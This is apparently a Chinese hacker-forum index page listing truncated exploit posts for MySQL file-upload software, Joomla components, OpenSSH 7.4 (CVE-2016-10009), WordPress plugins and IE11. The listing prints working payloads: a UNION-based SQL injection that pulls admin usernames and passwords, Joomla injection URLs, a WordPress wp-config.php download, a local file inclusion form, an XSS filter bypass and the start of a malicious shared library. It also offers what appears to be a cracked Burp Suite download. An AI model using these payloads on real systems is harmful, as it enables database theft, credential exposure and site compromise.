MySQL文件上传-ID参数SQL注入

SQL Injection/Exploit : # http://localhost/[PATH]/download.php?id=[SQL]&t=files # -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6+from+admin-- -&t=files # http://localhost/[P...

Joomla Calendar Component SQL注入

POC: http://[Site]/index.php?option=com_blog_calendar&modid=['SQLi]

OpenSSH 7.4代理协议任意库加载漏洞

CVE-2016-10009 $ cat evil_lib.c #include <stdlib.h> __attribute__((constructor)) static void run(void) { // in case you're loading this via LD_PRELOAD or LD_LIBRARY_PATH, // prevent recursion through s...

burpsuite V1.7.11

之前的版本貌似都集体失效了,这个版本是目前可以用的,刚测试了下。 下载地址: Burp v1.7

Joomla com_jsjobs SQL注入漏洞

Exp: http://127.0.0.1/index.php?option=com_jsjobs&c=jsjobs&view=employer&layout=view_job&vj=2&oi=680'

WordPress强制下载任意文件下载漏洞

###################### # PoC ###################### # [+] Using `force-download.php` file from `Wordpress websites we can download any file. # # [!] http://ihonker.org/force-download.php?file=wp-config.php # ##...

WordPress WP Fastest Cache 0.8.5.9 文件包含漏洞

WordPress WP Fastest Cache plugin version 0.8.5.9 suffers from a local file inclusion vulnerability. <html> <body> <form action="http://<target>/wp-admin/admin-ajax.php" meth...

IE11 XSS 过滤器绕过漏洞

EXP: http://unhonker.com/xss.php?x=%3Cmeta%20charset=cp1025%3E%27%20L%C9%86%D9%81%D4%85%40%C9%84~[%40%D6%95%D4%96%E4%A2%85%D6%A5%C5%99~m~%60JZ^NNm^mm~mNm^mmmm~mmNmm^mmmmmm~mmmmNmm^[JMOO}}N}}]JmZNMOO}}N}}]JmmZNMOO}}N...

Joomla com_availcal – SQL注入漏洞

PoC: # http://www.site.com/index.php?option=com_availcal&format=update&id=[SQL]

青客云sql注入漏洞第二发

本文出自红客联盟 太极实验室(ihonker.org) 这次不是延时注入,问题是出现在评论时获取ip处, 在发表评论的时候,发现,ip可以伪造,并且被带入到feedback数据库里面,一枚完美的注入产生了,在发表评论的时候,ip伪造下 8.8.8.8\&qu...

1...34567...38

插入图片
返回顶部